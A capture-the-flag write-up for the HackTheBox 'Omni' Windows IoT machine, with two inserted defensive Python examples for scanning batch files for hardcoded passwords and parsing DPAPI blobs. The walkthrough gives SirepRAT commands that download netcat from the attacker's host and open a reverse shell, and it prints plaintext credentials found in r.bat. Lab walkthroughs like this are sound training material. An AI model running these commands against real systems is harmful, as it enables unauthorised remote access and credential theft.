Omni — HackTheBox

Abass Sesay
4 min read · Jan 9, 2021
https://www.hackthebox.eu/home/machines/profile/271

TL;DR

This is a Windows IoT Core box that exposes a protocol with a well-built public exploit. With credentials for the Windows Device Portal, you can get both the user and root flags.

Reconnaissance

Since the lab lists its OS as “Other”, it does not fit the conventional Linux or Windows categories. Start the recon with an Nmap scan.

PORT      STATE SERVICE   VERSION
135/tcp   open  msrpc     Microsoft Windows RPC
5985/tcp  open  upnp      Microsoft IIS httpd
8000/tcp  open  http-alt?
8080/tcp  open  upnp      Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve  ARCserve Discovery
29820/tcp open  unknown

Nmap reveals IIS running, an indicator that the underlying OS is a variant of Windows. Port 8080 requires basic auth, and the realm name in the auth header (Windows Device Portal) further reinforces that this is a Windows box.

Windows Device Portal lets users manage devices running Windows IoT remotely, so this is an IoT box. The goal now is to obtain credentials for this portal. For that, the trio of ports 29817, 29819 and 29820 will be used; they correspond to the Sirep/WPCon protocol, for which a well-developed exploit exists.

Foothold

You can use this exploit to drop netcat on the box and then initiate a reverse shell.

kali@kali:~/HTB/Omni/SirepRAT$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell -exec bypass -c \"Invoke-WebRequest 'http://10.10.14.24:8000/nc64.exe' -OutFile 'C:\Data\Users\Public\nc.exe'\""
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
kali@kali:~/HTB/Omni/SirepRAT$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\Public\nc.exe 10.10.14.24 1337 -e cmd.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
kali@kali:~/HTB/Omni/SirepRAT$

You will land in a default account.

kali@kali:~/HTB/Omni$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.204] 49693
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\Users>echo %USERNAME% || whoami
echo %USERNAME% || whoami
DefaultAccount

User Reconnaissance

Now you can start enumerating in order to elevate to another user account, one that holds the user flag.

Listing all hidden files reveals the path you need to progress.

PS C:\Users> Get-ChildItem -Path C:\ -Recurse -File -Hidden -Name               
Get-ChildItem -Path C:\ -Recurse -File -Hidden -Name
...
Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat
Users\Default\ntuser.dat.LOG1
Users\Default\ntuser.dat.LOG2
Windows\system32\Microsoft\Protect\S-1-5-18\User\60cccb0e-2218-4962-8379-2b58fda526d1
Windows\system32\Microsoft\Protect\S-1-5-18\User\d479e9c4-a58e-4271-9baa-37e2838d4983
Windows\system32\Microsoft\Protect\S-1-5-18\User\Preferred

The content of this file (r.bat) reveals the passwords for both a user and the administrator. These credentials will then be used through the Windows Device Portal to run commands on the device.

PS C:\Users> cat "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"
cat "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
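A script like r.bat is a textbook case of credentials hardcoded into a maintenance script. The following is an added example, not part of the original write-up: a small scanner that flags `net user` lines carrying a literal password and `net localgroup` membership changes (including when they form the body of a `for` loop, as here), reporting line number, account and password length but never copying the secret itself into the findings. The sample input is the r.bat shown above with its line breaks restored.

```python
import re

# Sample input: the r.bat from the write-up above, line breaks restored.
SAMPLE_BAT = """@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
"""

# `net user <account> <password|*> [/add ...]`: the second token is a password
# unless it is "*" (interactive prompt) or a /switch (e.g. `net user x /delete`).
NET_USER = re.compile(r'\bnet\s+user\s+("[^"]*"|\S+)\s+("[^"]*"|\S+)', re.IGNORECASE)
# `net localgroup <group> <member> /add|/delete`, matched wherever it sits on the line
# so that the body of a FOR loop is caught as well.
NET_LOCALGROUP = re.compile(
    r'\bnet\s+localgroup\s+("[^"]*"|\S+)\s+(\S+)\s+/(add|delete)\b', re.IGNORECASE)


def scan_batch_for_credentials(text):
    """Return findings for hardcoded passwords and local group changes.

    Secrets are reported by length only, so the findings can be logged safely.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip().lower().startswith(("rem ", "::")):
            continue  # batch comment lines
        m = NET_USER.search(line)
        if m:
            account, second = m.group(1).strip('"'), m.group(2)
            if second == "*":
                findings.append({"line": lineno, "kind": "password_prompted",
                                 "account": account})
            elif not second.startswith("/"):
                findings.append({"line": lineno, "kind": "hardcoded_password",
                                 "account": account,
                                 "secret_len": len(second.strip('"'))})
        m = NET_LOCALGROUP.search(line)
        if m:
            findings.append({"line": lineno, "kind": "group_" + m.group(3).lower(),
                             "group": m.group(1).strip('"'), "member": m.group(2)})
    return findings


if __name__ == "__main__":
    for finding in scan_batch_for_credentials(SAMPLE_BAT):
        print(finding)
```

Run over the sample, the scanner reports the administrators-group purge on line 3 and the two password resets on lines 4 and 5; a `net user x *` or `net user x /delete` line is classified separately, so only literal passwords raise the hardcoded-credential finding.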

Log in with the user credentials via the portal. From the Processes section, select “Run command”. This allows you to run commands directly on the box.

From here you can use netcat to start a reverse shell.

From this shell you can start looking for files of interest. You will find that the user and root account folders are not in the normal location; instead they are under “C:\Data\Users”.

PS C:\> Get-ChildItem -Path C:\ -Recurse -Force -File -Name -Include *.txt
...
Data\Users\administrator\root.txt
Data\Users\app\hardening.txt
Data\Users\app\user.txt
...

If you look at one of the files of interest, you will see that it is a PowerShell secure string (a PSCredential exported with Export-CliXml). For both the user and root flags you will need to extract the plaintext string from it, and to do that you have to be logged in as the app or administrator account respectively, because the secure string is DPAPI-protected with that account's key.

PS C:\> cat Data\Users\app\user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>

User Flag

Log in through the portal as the user “app” and start a reverse shell. From the reverse shell, start PowerShell and execute the following.

(Import-CliXml -Path "C:\Data\Users\app\user.txt").GetNetworkCredential().Password

This extracts the plaintext string from the secure string.
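What Import-CliXml is undoing here is a DPAPI blob: Export-CliXml writes the SecureString as the hex of a CryptProtectData output, encrypted under the exporting user's master key, which is why it only opens as that user. The following is an added example, not code from the write-up: an offline triage that parses the CliXml shown above (taken from the page) and walks the DPAPI blob header without decrypting anything, reporting which master key GUID is needed, whether the blob is user- or machine-scoped, the algorithms, and the ciphertext length. For a defender this turns "a strange XML file" into "a credential recoverable by anyone who can run code as user X". The CALG_* and CRYPTPROTECT_LOCAL_MACHINE values are from wincrypt.h; the blob layout follows the documented CryptProtectData output.

```python
import struct
import uuid
import xml.etree.ElementTree as ET

# Sample input: the CliXml for C:\Data\Users\app\user.txt shown in the write-up.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>"""

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Every CryptProtectData blob starts with version 1 and this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # wincrypt.h; set when the blob is machine-scoped
# CALG_* identifiers (wincrypt.h) that DPAPI records in the blob header.
CALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES",
              0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}


def _u32(buf, off):
    """Little-endian DWORD at off; returns (value, new offset)."""
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _block(buf, off):
    """Length-prefixed field: DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob):
    """Walk the DPAPI blob header (no decryption) and summarise what it needs."""
    version, off = _u32(blob, 0)
    provider = uuid.UUID(bytes_le=blob[off:off + 16])
    off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    _mk_version, off = _u32(blob, off)
    master_key_guid = uuid.UUID(bytes_le=blob[off:off + 16])  # file under ...\Protect\<SID>\
    off += 16
    flags, off = _u32(blob, off)
    description, off = _block(blob, off)          # UTF-16LE, usually just a NUL
    crypt_alg, off = _u32(blob, off)
    crypt_len, off = _u32(blob, off)
    salt, off = _block(blob, off)
    _strong, off = _block(blob, off)              # "strong" entropy, normally empty
    hash_alg, off = _u32(blob, off)
    hash_len, off = _u32(blob, off)
    _hmac_key, off = _block(blob, off)
    data, off = _block(blob, off)                 # the encrypted SecureString (UTF-16LE)
    sign, off = _block(blob, off)                 # HMAC over the blob
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return {
        "master_key_guid": str(master_key_guid),
        "scope": "machine" if flags & CRYPTPROTECT_LOCAL_MACHINE else "user",
        "description": description.decode("utf-16-le").rstrip("\x00"),
        "cipher": CALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "key_bits": crypt_len,
        "hash": CALG_NAMES.get(hash_alg, hex(hash_alg)),
        "hash_bits": hash_len,
        "salt_len": len(salt),
        "ciphertext_len": len(data),
        "mac_len": len(sign),
    }


def triage_clixml_credential(text):
    """Report the object type, user name and DPAPI facts of an exported credential."""
    root = ET.fromstring(text)
    type_names = [t.text for t in root.iter(PS_NS + "T")]
    props = {el.get("N"): el for el in root.iter() if el.get("N")}
    password = props["Password"]
    result = {"type": type_names[0],
              "username": props["UserName"].text,
              "password_is_securestring": password.tag == PS_NS + "SS"}
    if result["password_is_securestring"]:
        result["dpapi"] = parse_dpapi_blob(bytes.fromhex(password.text.strip()))
    return result


if __name__ == "__main__":
    for key, value in triage_clixml_credential(SAMPLE_CLIXML).items():
        print(f"{key}: {value}")
```

The blob on this page is user-scoped (flags 0), AES-256 with SHA-512 HMAC, and names the master key GUID whose file lives in that user's Protect directory, exactly the kind of path that appeared in the hidden-file listing earlier. The 80-byte ciphertext also bounds the secret's length, since SecureString plaintext is UTF-16LE padded to 16-byte blocks.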

Root Flag

Repeat the same process here: from the portal, log in as “administrator” and then start a reverse shell.

(Import-CliXml -Path "C:\Data\Users\administrator\root.txt").GetNetworkCredential().Password

Abass Sesay

Aspiring Cybersecurity professional currently working as a Software Engineer. Hail from Sierra Leone currently living in the Pacific North West.